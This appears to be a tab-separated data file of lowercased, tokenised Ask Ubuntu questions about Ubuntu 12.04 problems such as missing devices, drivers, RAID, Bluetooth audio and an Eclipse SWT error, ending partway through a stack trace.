180279	devices list are n't show on nautilus	after updating 12.04 , my hdd partitions and usb storage devices was removed from the devices list on nautilus sidebar , only the `` floppy0 '' is there . i can see all of them with disk utility . i can mount them and add them to computer list on nautilus ( not to device list ) . i ca n't see any device in /media , only `` floppy '' , `` floppy0 '' and `` cdrom '' folders . fstab file : # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 # / was on /dev/sda3 during installation uuid=ec9a8bbb-4cf0-4599-bf0e-85f7e3de6302 / ext4 errors=remount-ro 0 1 # swap was on /dev/sda6 during installation uuid=88002a18-0f7f-4e7a-87b7-ef8e9f6388c8 none swap sw 0 0 /dev/fd0 /media/floppy0 auto rw , user , noauto , exec , utf8 0 0
180283	are ubuntu specific packages capable of installing on lubuntu ?	i want to switch to lubuntu 64 bit . initially i had ubuntu 64 bit . i have saved all the packages in /var/cache/apt/archive ; my question is that can i use the same packages for lubuntu 64 bit and install them via synaptic manager ?
180287	what is the meaning of building packages in a ppa ?	i have uploaded one ppa into my launchpad account successfully . but its giving me a message on right side as package building is pending . when i click for more information it gave me both 32-bit and amd64 architecture and with message as this package needs building but now i have seen them as built successfully . could some explain me the situation happen here ? thank you .
180289	can i install the drivers offered by hp on my laptop using wine ?	i am asking this question because the drivers provided on the hp website will cost me around 1.2 gb of bandwidth download . before downloading them i wanted to confirm if it 's possible to install the drivers provided by hp because they are for ms windows .
180295	installed app does n't show on installed applications lens ( ubuntu 12.04 dash )	recently , i installed the software sources app on my 12.04 lts but it does n't show on the installed applications ( applications lens ) . it shows on /usr/share/applications . what needs to be done so that the software sources icon appear on the application lens ? thanks . [ desktop entry ] name=software sources genericname=software sources comment=configure the sources for installable software and updates exec=software-properties-gtk icon=software-properties terminal=false nodisplay=true x-multipleargs=false type=application categories=gnome ; gtk ; settings ; x-gnome-systemsettings ; mimetype=text/x-apt-sources-list ; x-kde-substituteuid=true x-ubuntu-gettext-domain=software-properties
180299	unable to play .mp4 files ( videos )	i am running ubuntu 12.04 , and have installed all restricted packages and 354 mb of available updates . however , i still am not able to play video 's . is it because of low memory ( ram ) ? my computer specifications are : 512mb memory ( ram ) 1.15ghz prcessor
180301	how to remove mate desktop from ubuntu 12.04	i just installed the mate desktop following the instructions here but im not satisfied with mate ( actually it totally looks like a mess ) so i want to completely remove it from my system ... how can i do that ? i think its not enough to remove just the mate-core package using apt-get remove ? thanks
180302	do n't want raid to autostart	i have software raid in my system , and i would really like it not to automatically start at system boot . ubuntu system is installed on a partition not on a raid ( no need whatsoever to start raid for booting system ) lsb_release -a no lsb modules are available . distributor id : ubuntu description : ubuntu 12.04.1 lts release : 12.04 codename : precise uname -a linux coruscant 3.2.0-29-generic # 46-ubuntu smp fri jul 27 17:03:23 utc 2012 x86_64 x86_64 x86_64 gnu/linux i did try to : manually prevent anything ( module/script ) md/raid to be loaded in initramfs image blacklist raid module passing to the kernel raid=noautodetect how can i do this ?
180306	why can not see axel window ?	i have installed axel and set it to get my firefox downloads through flashgot . it works but the axel window is not visible - so can not know when the download starts and ends , its speed etc . i have recently installed lubuntu precise . before i was using the same but the main installation was xubuntu and did not have this problem .
180309	how to change the default application icons of gnome shell 's top right area	im using gnome 3 with gnome shell , my problem is some of the applications that have indicators in the top right area dont have icons that fit with the others . this is how my indicator icons look like : i want if possible to find the skype and pidgin icons and replace them ( i tried searching for pidgins with dpkg -l pidgin but did n't notice any icon-like extensions of the listed files ) .
180310	problem installing ubuntu 12.04 with amd hd6670 graphics card	i have an identical problem to the chap in the question-link below ( who even provided a video of his problem ) , where the screen `` scrambles '' when it loads : problem while installing ubuntu with ati radeon 6670 hd i seem to be using a slightly different graphics card , though ( amd hd6670 ) . my pc is brand new , and is an advent dt2111 . this is my first time ever trying to use linux , so do n't know anything about it . it seems i need to update a driver from within ubuntu , but how do i do that if i ca n't even access it ? i have tried loading it in safe graphics mode , and the same thing happens . i am really lost as to what to do , and advice in other links is just too advanced for me at this beginning stage of my ubuntu experience ( i.e . non-existent ) . help gratefully received ! jim .
180312	is it possible to assign shortcuts to launch applications ?	i need some short cuts to launch applications , as opening them from the dash takes time . is it possible to launch applications from a custom key combination ?
180313	trojan in ubuntu ? diginotar	on wednesday , i installed an old copy of ubuntu 10.04lts onto a pristine desktop pc that i built w/ brand new hardware -- dsl modem , too -- except for the cpu . then , i downloaded ubuntu 12.04 from ubuntu.com , and compared hash values before erasing v10.04 & installing the new os . the old 10.04 disk & the virgin cd onto which i burned the ubuntu v12.04 iso file are the only external media this pc has seen . as a new convert to open source & a paranoid ex-windows user ( for good reason ) , i have been scanning every file i download , and randomly scanning the entire system every few hours , with clamtk . it found trojans in ubuntu 's built-in ruby program ; a photoshop file and a sysinternals tool i downloaded last night ; and several files in the firefox cache . all but one malware specimen belong to the same family . when instructed to quarantine the infected files in the firefox cache , clamtk appeared to do so but the quarantine list was empty . as a precaution , i emptied the cache . note : clamtk refuses to quarantine the infected ruby & photoshop files . is that normal ? google provided sparse info about the trojans , except they were first noted about 10 years ago . there does seem to be a surge of inquiries about them in google over the past 2 weeks . it 's unlikely that ruby has had a known trojan all this time , that clamtk simply ignored till now ... i doubt these malware are false-positives . some questions : is anyone else finding pua.win32.xxxxx with clamtk ? is ubuntu naturally immune to malware named `` win32 '' ? actually , what compels me to post here is finding , while i was checking my firefox preferences , six diginotar entries in the list of security certificates ( advanced -- > encryption -- > view certificates ) . the it security world ostracized diginotar last fall , & mozilla permanently removed diginotar from its list of approved certification providers ( see http : //blog.mozilla.org/security/2011/09/02/diginotar-removal-follow-up/ ) . so , i am wondering : did ubuntu developers forget to remove diginotar from ubuntu 's version of firefox in v12.04 ? does anyone else have diginotar in your list of certification authorities ? are the diginotar certificates and the trojans i am finding related ? thanks for any information you can provide .
180315	in ubuntu 10.04 - make your i5 processor run all cores	i would like to know if this is possible in ubuntu 10.04 . i would like to make my i5 processor run all cores at the same level , bringing the first core down , so that the other cores can work also , and not just the first core , other wise the computer is making the first core run most of the time at full , while the last core does n't even go up ... hope you understand . is there something ?
180319	mongod fails to start with error : mongod : symbol lookup error : mongod : undefined symbol : _zn7pcrecpp2re4initepkcpkns_10re_optionse	i am trying to start mongod but i get $ mongod mongod -- help for help and startup options mongod : symbol lookup error : mongod : undefined symbol : _zn7pcrecpp2re4initepkcpkns_10re_optionse searching on google it seems to be related with libpcre ; i tried to install last versions of libpcre3 and libpcre++ but it does n't work . mongodb shell 's version ( and mongodb-server 's version ) is 2.0.4 . ubuntu 's version is 12.04. libpcre3 's version is 8.12-4. libpcre++0 's version is 0.9.5-5.1 . thanks
180320	bash script : program with parameters as a single variable : command not found	i wrote the bash script below ( called hdmi_output ) and it 's working in most parts as i expect it . for example , i run hdmi_output run firefox and firefox is started on the external monitor . but sometimes i want to run programs with arguments and this does n't work anymore . e.g . when running hdmi_output run `` firefox -p -no-remote '' , i get this : /usr/bin/vglrun : 296 : exec : **firefox -p -no-remote : not found i wrote it in quotes to be treated as one variable , but it does n't seem to work . can anyone help me to improve the script , maybe shift command should be used ? # ! /bin/bash start_hdmi ( ) { ... ... } run_hdmi ( ) { display=:8 ld_library_path=/usr/lib/nvidia-current : $ ld_library_path optirun `` $ @ '' } if [ [ `` $ @ '' == `` start '' ] ] ; then start_hdmi elif [ [ `` $ # '' == `` 2 '' & & `` $ 1 '' == `` run '' ] ] ; then run_hdmi `` $ 2 '' else echo `` $ 0 start|run < program > '' fi
180322	how to create tables in basket ? or any other similar softwares ?	i was searching for notebook softwares . installed zim , cherrytree & basket basket is best of them , but unable to create tables . any suggestions ?
180323	mouse gets stuck when switching screens	hi i have the latest amd drivers , and 3 monitors setup . when moving the mouse from one screen to another it seems like it gets stuck , and i have to keep moving it for it to finally switch , its really odd , does anybody know a quick fix ? example : ( the black is the other screen and the pattern is the other screen ) if i move the mouse fast enough it dose n't seems to happen .
180335	how to reduce dock bar size ?	i 'm not getting dock bar resizing option in system settings > > appearance > > behaviour do i need to install anything else for this
180336	how to find the process id ( pid ) of a running terminal program ?	i am running a program in the terminal that i ca n't escape with ctrl-c and that i want to kill . how can i find its pid ?
180338	how to smooth subtitle fonts in smplayer ?	how to smooth subtitle fonts in smplayer in ubuntu 12.04 . i prefer a solution for smplayer . when the movie is playing subtitle fonts are blurry and pixelized .
180342	can i directly use the qt and gtk+ libraries i saw in the update manager ?	i installed ubuntu 12.04 on my laptop today , and when i was updating it using the update manager , i saw it downloading qt and gtk libraries . does that mean i can use them directly ? or will i need to download them from their respective sites and build them ?
180343	frazer in wine ?	just wondering if anyone successfully ran frazer in ubuntu 12.04 with wine ? frazer is an inventory management software for auto dealerships , it 's extremely outdated , runs off of a server which provides a *.exe link to access it . ( everyone hates it , but it gets the job done . ) if anyone has done this , let me know if it 's stable and usable on daily basis without any hiccups . my ultimate goal is to install ubuntu on all the systems at our dealership , so far libreoffice & gimp have successfully replaced ms office & photoshop for everyone here . last thing i want to test is this frazer . thanks in advance !
180345	my window 7 works slow when i have installed ubuntu on my laptop	my laptop configurations is as follows : core i5 2.27ghz ( m430 ) 500gb hard drive integrated graphics ( no graphic card ) 4gb memory ( ram ) i am running ubuntu 12.04 , in dual-boot mode .
180359	thunderbird not loading any mails from yahoo , pop issue	i have thunderbird installed in my ubuntu 12.04 .previously i have configured that properly and getting and sending message is a usual thing i did , but suddenly from few days i am not getting any mails from it even though there are new mails . i have tried several times by deleting the account and adding again but nothing i got .previously its worked but now its not . i am not getting the issue . i can add the account successfully but i am unable to get the mails both new and old . edit : in trails i have figured out one thing , with imap i can get the mail & i can read them . so now i came to a conclusion there is something with pop . help me to solve this . thank you .
180363	is it possible to use onboard graphics for ubuntu and dedicated card for windows ?	i 'm having lots of problems with my ati radeon hd5670 card on ubuntu 12.04 lts . i 've tried all the possible drivers and they were all giving me frequent freezes and slowdowns which is not at all usable . i 'm wondering if it 's possible to use my onboard video ( geforce 6 or 7 series ) when on ubuntu and use the ati card on windows ? is this possible without taking out my gpu physically ? thanks a lot .
180374	do i need any drivers ?	i am new to ubuntu so i have some doubts regarding ubuntu . my system is dell inspiron n4010 with 3gb ram and preloaded with windows 64 bit . i would like to install ubuntu 12.04 lts . so i downloaded the 64 bit version . will it work perfectly on my machine ? last time i used some old versions of ubuntu and the wifi was not working properly . will there be any issue like that ? thanks in advance
180375	windows xp/ubuntu dual boot - separate drives - going straight to a grub prompt	just installed ubuntu for the first time . i have it on two separate drives . when i boot ( from my main drive with the windows xp install ) it gives me two options : -windows -ubuntu if i select ubuntu and hit enter , it goes to gnu grub version 1.99-21ubuntu3 . if i change the boot drive to the one with linux on it , it boots perfectly . but i do n't want that , i 'd like a dual boot option and i 'd like to be able to access the content on my windows hard drive . any tips on how to fix this ? i tried boot repair ( running through the auto steps ) and it did n't help .
180377	is it possible to accelerate downloads in synaptic manager ?	in terminal that is possible by using apt-fast ( using axel ) . but is it possible to put to work axel and apt-fast in synaptic manager ? i found this suggestion , but i would not attempt it without the assistance from ask ubuntu : )
180379	how can i pair up wiimote plus to my ubuntu 12.04 machine ?	it keeps asking for the pin , and the option of connecting a device without pin is not added to ubuntu for some reason . i know there are things like wiican , but the package is not available for some reason . plus i just want it to pair up with my system , and let dolphin-emu do the rest , i dont want to emulate a mouse or anything .
180389	no hud on desktop on new ubuntu installation	so i installed ubuntu 12.04 and i have no hud . i was able to bring up firefox only from my settings menu by clicking on a link for more information on cloud . where is my hud ? i have no access to my programs at all ?
180395	what is the correct way to use g_signal_connect ( ) in c++ for dynamic unity quicklists ?	i want to make my application use dynamic unity quicklists . for building my application i am using c++ and the qtcreator ide . when a menu action is triggered i want to be able to have access to a non-static function of my mainwindow class so as to be able to update the graphical user interface which can be accessed from inside 'normal ' mainwindow 's functions . so , i am building up my quicklist like this ( mainwindow.cpp ) : void mainwindow : :enable_unity_quicklist ( ) { unity_menu = dbusmenu_menuitem_new ( ) ; dbusmenu_menuitem_property_set_bool ( unity_menu , dbusmenu_menuitem_prop_visible , false ) ; unity_stop = dbusmenu_menuitem_new ( ) ; dbusmenu_menuitem_property_set ( unity_stop , dbusmenu_menuitem_prop_label , `` stop '' ) ; dbusmenu_menuitem_child_append ( unity_menu , unity_stop ) ; g_signal_connect ( unity_stop , dbusmenu_menuitem_signal_item_activated , g_callback ( & fake_callback ) , ( gpointer ) this ) ; if ( ! unity_entry ) unity_entry = unity_launcher_entry_get_for_desktop_id ( `` myapp.desktop '' ) ; unity_launcher_entry_set_quicklist ( unity_entry , unity_menu ) ; dbusmenu_menuitem_property_set_bool ( unity_menu , dbusmenu_menuitem_prop_visible , true ) ; dbusmenu_menuitem_property_set_bool ( unity_stop , dbusmenu_menuitem_prop_visible , true ) ; } void mainwindow : :fake_callback ( gpointer data ) { mainwindow* m = ( mainwindow* ) data ; m- > on_stopbutton_clicked ( ) ; } void mainwindow : :on_stopbutton_clicked ( ) { //stopping the process ... } mainwindow.h : private slots : void enable_unity_quicklist ( ) ; void on_stopbutton_clicked ( ) ; public slots : static void fake_callback ( gpointer data ) ; this suggestion was taken from http : //old.nabble.com/using-g_signal_connect-in-class-td18461823.html the program crashes immediately after i choose the 'stop ' action from the unity quicklist . debugging the program shows that i am not able to access anything mainwindow related inside the on_stopbutton_clicked ( ) without crashing . for example , it crashes when doing this check ( which is the first 2 lines of code inside this function ) : if ( ! ui- > stopbutton- > isenabled ( ) ) return ; i have also tested lots of other things that i found at the internet , but nothing of them worked . one interesting solution would be to use gtkmm ( http : //developer.gnome.org/gtkmm-tutorial/stable/sec-connecting-signal-handlers.html.en ) but i am not used at all working on gtk applications ( i work solely in qt ) and i do n't know if this even suits to my occasion .
180397	what is the best downloading program for ubuntu ?	i want to know the best downloading program for ubuntu , like idm ( internet download manager ) on windows and have the features of idm .
180399	which java should i install ?	i 've seen many articles about how to install java . my question is which one should i install for java development ? openjdk 6 , openjdk 7 , oracle java 6 , or oracle java 7 ? some sites tell me to install oracle java 6 and 7 , some say just 7 . so , what are the advantages and disadvantages of them both ?
180402	how to set a short password on ubuntu ?	when i install the ubuntu , i set a short password ( < 4 ) . now i want to change the other short password by `` passwd '' or change passphrase on `` password and keys '' program , it needs a password > 4 char .
180403	how to uninstall libreoffice ?	which package should i remove to completely remove libreoffice ? i have no need for office tools . that 's the one gripe i have with package managers like apt , there 's no simple way to perform the essential task of removing unwanted software : s
180404	how do i access my previous ubuntu disk when booted to usb key	when prompted about the upgrade to 12.04 i clicked yes . all went well until during the cleanup mode an error appeared in the terminal that said something like `` too many errors were encountered . '' a few minutes after that i lost all video . after a few more minutes i did a hard shutdown of the computer and restarted . now , it boots to ui very quickly . the buttons are there but they are all white . background is white . no icons . no mouse or keyboard . ( cursor appears on screen but no response. ) . none of the previous kernels will boot either . i can start the grub loader ... choose one and i briefly see the ubuntu progress meter ( which i do n't with upgraded install ) then black screen with mouse ( which does respond ) but then nothing . i am ok with reinstalling but there are some virtual-box images i desperately want to get off of there first . i boot to bootable ( 12.04 ) usb . i also attach another external hd . i boot to usb without installing it shows my 500 gb disk that the upgraded install is on . but whenever i click on it it says `` the folder contents could not be displayed . you do not have the permissions necessary to view the contents of `` 500gbdrive '' . how can i mount that disk to save my data off onto the external drive before i reinstall ? what is the best way to recover from this . if i reinstall will my old file system ( with the vbox hd ) be preserved ? ( i am backing it up no matter what though . ) i am a pretty new to linux . help !
180412	my wired connection says it 's connected , but nothing works . ( 12.04 )	after spending hours trying to get my wired comcast internet to work on ubuntu , i thought i had finally got it to work when i discovered that i needed to set it as a static ip by setting the ipv4 as manual and filling in the required information ( i was able to see the up and down arrows afterwards ) . it only took a few minutes to realize i still had more work to do . firefox pages load indefinitely and downloads from the software center stay in waiting mode . my question is , what did i do wrong ? my stats and such : mac is bc : ae : c5:99 : fd:14 ( for cloned i just put the same ) . i do n't think there is any 802.1x security so i left it unchecked . ip is 24.23.188.52 . subnet mask is 255.255.255.0 . gateway is 192.168.1.1 . dns servers are 75.75.75.75 , 75.75.76.76 , 192.168.1.1 , 208.67.222.222 . search domains i did n't know any so i put google.com ( that 's probably the issue but i do n't know ) . also ipv6 i left as automatic . my pc is dual booted with windows 7 64bit and ubuntu 12.04 64bit . edit : ok , i tried nlightnfotis 's directions , here is what happened : pinging www.askubuntu.com returned tradping : unknown host www.askubuntu.com doing traceroute returned the program 'traceroute ' can be installed in the following packages : inetutils-traceroute traceroute it then told me i could install it with sudo apt-get , and i tried that but it `` could not find the package '' adding 8.8.8.8 to dns did nothing , unfortunately . 8.8.4.4 does nothing also . i am very new to linux and ubuntu , by the way . setting the connection to dhcp does n't disconnect it , but the internet still refuses to load anything . still have nothing , netstat -nr doesnt show any items under any category . here is a random pic with data , maybe it 'll help . http : //www.mediafire.com/view/ ? zk2yjn7khfocf94 # ( ipv4 from when its on manual ) any and all help is appreciated .
180429	top bar and left bar disappeared after compiz	i 'm using ubuntu 12.04 lts 64 bit . there is two unity interface ubuntu and ubuntu 2d on login screen . i 'm always using ubuntu . today i installed compizconfig setting manager and try a few effect etc . for just fun . and than i want to back to my old ( original ) ubuntu interface . so , i clicked to reset to defaults on preferences screen . and suddenly top bar and left bar disappeared ( look that badly drawn white arrows , pointing these bars ) . also dashboard not activating when press to windows key on my keyboard . when i choose ubuntu 2d , it 's normal . there is no problem . but i want normal 'ubuntu` interface , back . what should i do ?
180432	what happened to my launcher icon size slider in settings > appearance and how can i get it back ?	when i first installed 12.04 lts , only a week ago i had access to at least two cool features : ( 1 ) the orange box that appeared when you drag a window to the top or either side of the screen ( let go and the window would fill the box ) ; and ( 2 ) a slider bar in settings â appearance that allowed me to change the size of the icons in my launcher . a week later i installed some updates , and now both of those things are gone . anyone else have this problem ? how can i fix it ? i may have two separate issues , but it seems to me to be more than coincidence that they became dysfunctional about the same time .
180434	curious about how fast ubuntu copies files	i 've installed ubuntu 12.04 using the normal installer . things having been working fine , but a few minutes ago i copied a 14gb file and it said it had copied the file very quickly -- so quickly i do n't believe it . i was hoping that someone could give me some insight into what ubuntu is doing here . is it just making some sort of link to the file or perhaps continuing to copy the file in the background and not telling me ? thankyou : )
180437	bluetooth headset a2dp works , hsp/hfp not ( no sound/no mic )	my philips sbh9001 headset pairs fine using ubuntu 12.04 . in the audio settings it 's properly detected as a2dp device and as hsp/hfp device . hardware : thinkpad x230 , ubuntu 12.04 64bit , kernel 3.6.0-030600rc3-generic ( build from ubuntu mainline repo ) , bluetooth device is usb-id 0a5c:21e6 from broadcom , headset is a philips sbh9001 . note : kernel 3.6 rc3 is used because of a fix for audio on the dockingstation that is not in any previous branches . playing audio in a2dp works just fine out of the box , but when switching the headset to hsp/hsp mode there is no sound nor does the microphone work . when connecting the headset , /var/log/syslog shows : aug 25 21:32:47 x230 bluetoothd [ 735 ] : badly formated or unrecognized command : at+csrsf=1,1,1,1,1,7 aug 25 21:32:49 x230 rtkit-daemon [ 1879 ] : successfully made thread 17091 of process 14713 ( n/a ) owned by '1000 ' rt at priority 5 . aug 25 21:32:49 x230 rtkit-daemon [ 1879 ] : supervising 4 threads of 1 processes of 1 users . aug 25 21:32:50 x230 kernel : [ 4860.627585 ] input : 00:1e:7c:01:73 : e1 as /devices/virtual/input/input17 when switching from a2dp ( standard profile ) to hsp/hfp : aug 25 21:34:36 x230 bluetoothd [ 735 ] : /org/bluez/735/hci0/dev_00_1e_7c_01_73_e1/fd3 : fd ( 34 ) ready aug 25 21:34:36 x230 rtkit-daemon [ 1879 ] : successfully made thread 17309 of process 14713 ( n/a ) owned by '1000 ' rt at priority 5 . aug 25 21:34:36 x230 rtkit-daemon [ 1879 ] : supervising 4 threads of 1 processes of 1 users . aug 25 21:34:41 x230 bluetoothd [ 735 ] : audio connection got disconnected any hints how to get hsp/hfp working here ?
180440	why are commercial ppa updates suddenly very slow ?	when using apt-get update from terminal , i can see process come to a grinding halt when the commercial ppas are updating . in hoping that this is n't intentional , is there a fix to get apt-get update working faster with commercial ppas ? i do n't want to remove the commercial ppas
180444	alternate install to usb bootloader issues using lvm encryption	i am trying to use the alternate installer ( 12.04.1 i386 ) run from a cd to install onto a usb thumb drive ( to have a portable installation ) . i am using the guided lvm install . i get to the part where it asks to install the boot-loader into the windows 7 mbr on the main hard drive so of course i say no , but then it asks where instead i would like to install it , i type in the name of the unencrypted volume on the thumb drive /dev/sdb1 but it gives an error and will not install . am i doing something wrong ? any help is appreciated as i am about to have a cerebral hemorrhage .
180447	no sound detected in ubuntu 12.04	after executing lspci , this is the output : 00:00.0 host bridge : intel corporation 82x38/x48 express dram controller ( rev 01 ) 00:01.0 pci bridge : intel corporation 82x38/x48 express host-primary pci express bridge ( rev 01 ) 00:1a.0 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 4 ( rev 02 ) 00:1a.1 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 5 ( rev 02 ) 00:1a.2 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 6 ( rev 02 ) 00:1a.7 usb controller : intel corporation 82801i ( ich9 family ) usb2 ehci controller # 2 ( rev 02 ) 00:1b.0 audio device : intel corporation 82801i ( ich9 family ) hd audio controller ( rev 02 ) 00:1c.0 pci bridge : intel corporation 82801i ( ich9 family ) pci express port 1 ( rev 02 ) 00:1c.2 pci bridge : intel corporation 82801i ( ich9 family ) pci express port 3 ( rev 02 ) 00:1c.4 pci bridge : intel corporation 82801i ( ich9 family ) pci express port 5 ( rev 02 ) 00:1c.5 pci bridge : intel corporation 82801i ( ich9 family ) pci express port 6 ( rev 02 ) 00:1d.0 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 1 ( rev 02 ) 00:1d.1 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 2 ( rev 02 ) 00:1d.2 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 3 ( rev 02 ) 00:1d.7 usb controller : intel corporation 82801i ( ich9 family ) usb2 ehci controller # 1 ( rev 02 ) 00:1e.0 pci bridge : intel corporation 82801 pci bridge ( rev 92 ) 00:1f.0 isa bridge : intel corporation 82801ir ( ich9r ) lpc interface controller ( rev 02 ) 00:1f.2 ide interface : intel corporation 82801ir/io/ih ( ich9r/do/dh ) 4 port sata controller [ ide mode ] ( rev 02 ) 00:1f.3 smbus : intel corporation 82801i ( ich9 family ) smbus controller ( rev 02 ) 00:1f.5 ide interface : intel corporation 82801i ( ich9 family ) 2 port sata controller [ ide mode ] ( rev 02 ) 01:00.0 vga compatible controller : advanced micro devices [ amd ] nee ati rv670 [ radeon hd 3870 ] 01:00.1 audio device : advanced micro devices [ amd ] nee ati rv670/680 hdmi audio [ radeon hd 3690/3800 series ] 02:00.0 ethernet controller : marvell technology group ltd. 88e8056 pci-e gigabit ethernet controller ( rev 12 ) 03:00.0 ide interface : jmicron technology corp. jmb368 ide controller 04:00.0 ethernet controller : marvell technology group ltd. 88e8056 pci-e gigabit ethernet controller ( rev 12 ) 06:03.0 firewire ( ieee 1394 ) : via technologies , inc. vt6306/7/8 [ fire ii ( m ) ] ieee 1394 ohci controller ( rev c0 ) 00:1b.0 and 01:00.1 are both detected as audio devices ? is it possible that the sound is trying to go out the hdmi port on my graphics card by default ?
180448	how to connect to / edit files on 12.04 guest from windows 7 host ?	i would like to have the following setup , but i do n't really know where to start looking or if it is even possible : windows 7 is the host operating system ubuntu 12.04 guest operating system is running development server in virtual box . i would like to be able to edit files on 12.04 , using sublime text 2 on windows 7 . also like to be able to view the dev website using a web browser on windows 7 . is this possible ?
180449	open eclipse juno with error “no more handles …” in ubuntu 12.04	starting today , every time i open up the eclipse , i got a message box with title `` problem occured '' pops up saying : no more handles [ unknown mozilla path ( mozilla_five_home not set ) ] possible args : { 0 } , { 1 } , { 2 } , { 3 } no more handles [ unknown mozilla path ( mozilla_five_home not set ) ] then i click `` ok '' and proceed to the workbench , i got another error saying an swt error has occurred . you are recommended to exit the workbench . subsequent errors may happen and exit the workbench without warning . see the .log file for more details . do you want to exit the workbench ? ( yes / no ) then i clicked `` yes '' and took a look at the .log file in .metadata . i saw this long stacktrace : ! entry org.eclipse.datatools.sqltools.plan 4 0 2012-08-25 14:28:52.355 ! message no resource bundle has been set for the loggerno more handles [ unknown mozilla path ( mozilla_five_home not set ) ] '' . ! entry org.eclipse.datatools.sqltools.plan 4 0 2012-08-25 14:28:52.359 ! message no more handles [ unknown mozilla path ( mozilla_five_home not set ) ] possible args : { 0 } , { 1 } , { 2 } , { 3 } ! stack 0 org.eclipse.swt.swterror : no more handles [ unknown mozilla path ( mozilla_five_home not set ) ] at org.eclipse.swt.swt.error ( swt.java:4387 ) at org.eclipse.swt.browser.mozilla.initmozilla ( mozilla.java:1939 ) at org.eclipse.swt.browser.mozilla.create ( mozilla.java:699 ) at org.eclipse.swt.browser.browser. < init > ( browser.java:99 ) at org.eclipse.datatools.sqltools.plan.internal.ui.view.graphicsplancontrol.createdetailform ( graphicsplancontrol.java:93 ) at org.eclipse.datatools.sqltools.plan.internal.ui.view.graphicsplancontrol.init ( graphicsplancontrol.java:73 ) at org.eclipse.datatools.sqltools.plan.internal.ui.view.graphicsplancontrol. < init > ( graphicsplancontrol.java:54 ) at org.eclipse.datatools.sqltools.plan.internal.ui.view.planview.createpartcontrol ( planview.java:136 ) at org.eclipse.ui.internal.e4.compatibility.compatibilitypart.createpartcontrol ( compatibilitypart.java:129 ) at org.eclipse.ui.internal.e4.compatibility.compatibilityview.createpartcontrol ( compatibilityview.java:155 ) at org.eclipse.ui.internal.e4.compatibility.compatibilitypart.create ( compatibilitypart.java:300 ) at sun.reflect.nativemethodaccessorimpl.invoke0 ( native method ) at sun.reflect.nativemethodaccessorimpl.invoke ( nativemethodaccessorimpl.java:39 ) at sun.reflect.delegatingmethodaccessorimpl.invoke ( delegatingmethodaccessorimpl.java:25 ) at java.lang.reflect.method.invoke ( method.java:597 ) at org.eclipse.e4.core.internal.di.methodrequestor.execute ( methodrequestor.java:56 ) at org.eclipse.e4.core.internal.di.injectorimpl.processannotated ( injectorimpl.java:857 ) at org.eclipse.e4.core.internal.di.injectorimpl.processannotated ( injectorimpl.java:837 ) at org.eclipse.e4.core.internal.di.injectorimpl.inject ( injectorimpl.java:111 ) at org.eclipse.e4.core.internal.di.injectorimpl.internalmake ( injectorimpl.java:318 ) at org.eclipse.e4.core.internal.di.injectorimpl.make ( injectorimpl.java:240 ) at org.eclipse.e4.core.contexts.contextinjectionfactory.make ( contextinjectionfactory.java:161 ) at org.eclipse.e4.ui.internal.workbench.reflectioncontributionfactory.createfrombundle ( reflectioncontributionfactory.java:102 ) at org.eclipse.e4.ui.internal.workbench.reflectioncontributionfactory.docreate ( reflectioncontributionfactory.java:71 ) at org.eclipse.e4.ui.internal.workbench.reflectioncontributionfactory.create ( reflectioncontributionfactory.java:53 ) at org.eclipse.e4.ui.workbench.renderers.swt.contributedpartrenderer.createwidget ( contributedpartrenderer.java:141 ) at org.eclipse.e4.ui.internal.workbench.swt.partrenderingengine.createwidget ( partrenderingengine.java:889 ) at org.eclipse.e4.ui.internal.workbench.swt.partrenderingengine.safecreategui ( partrenderingengine.java:623 ) at org.eclipse.e4.ui.internal.workbench.swt.partrenderingengine $ 6.run ( partrenderingengine.java:511 ) at org.eclipse.core.runtime.saferunner.run ( saferunner.java:42 ) at org.eclipse.e4.ui.internal.workbench.swt.partrenderingengine.creategui ( partrenderingengine.java:496 ) at org.eclipse.e4.ui.workbench.renderers.swt.elementreferencerenderer.createwidget ( elementreferencerenderer.java:74 ) at org.eclipse.e4.ui.internal.workbench.swt.partrenderingengine.createwidget ( partrenderingengine.java:889 ) at org.eclipse.e4.ui.internal.workbench.swt.partrenderingengine.safecreategui ( partrenderingengine.java:623 ) at org.eclipse.e4.ui.internal.workbench.swt.partrenderingengine.safecreategui ( partrenderingengine.java:725 ) at org.eclipse.e4.ui.internal.workbench.swt.partrenderingengine.access $ 2 ( partrenderingengine.java:696 ) at org.eclipse.e4.ui.internal.workbench.swt.partrenderingengine $ 7.run ( partrenderingengine.java:690 ) at org.eclipse.core.runtime.saferunner.run ( saferunner.java:42 ) at org.eclipse.e4.ui.internal.workbench.swt.partrenderingengine.creategui ( partrenderingengine.java:675 ) at org.eclipse.e4.ui.workbench.renderers.swt.stackrenderer.showtab ( stackrenderer.java:1042 ) at org.eclipse.e4.ui.workbench.renderers.swt.lazystackrenderer.postprocess ( lazystackrenderer.java:98 ) at org.eclipse.e4.ui.internal.workbench.swt.partrenderingengine.safecreategui ( partrenderingengine.java:639 ) at org.eclipse.e4.ui.internal.workbench.swt.partrenderingengine.safecreategui ( partrenderingengine.java:725 ) at org.eclipse.e4.ui.internal.workbench.swt.partrenderingengine.access $ 2 ( partrenderingengine.java:696 ) at org.eclipse.e4.ui.internal.workbench.swt.partrenderingengine $ 7.run ( partrenderingengine.java:690 ) at org.eclipse.core.runtime.saferunner.run ( saferunner.java:42 ) at org.eclipse.e4.ui.internal.workbench.swt.partrenderingengine.creategui ( partrenderingengine.java:675 ) at org.eclipse.e4.ui.workbench.renderers.swt.swtpartrenderer.processcontents ( swtpartrenderer.java:59 ) at org.eclipse.e4.ui.internal.workbench.swt.partrenderingengine.safecreategui ( partrenderingengine.java:635 ) at org.eclipse.e4.ui.internal.workbench.swt.partrenderingengine.safecreategui ( partrenderingengine.java:725 ) at org.eclipse.e4.ui.internal.workbench.swt.partrenderingengine.access $ 2 ( partrenderingengine.java:696 ) at org.eclipse.e4.ui.internal.workbench.swt.partrenderingengine $ 7.run ( partrenderingengine.java:690 ) at org.eclipse.core.runtime.saferunner.run ( saferunner.java:42 ) at org.eclipse.e4.ui.internal.workbench.swt.partrenderingengine.creategui ( 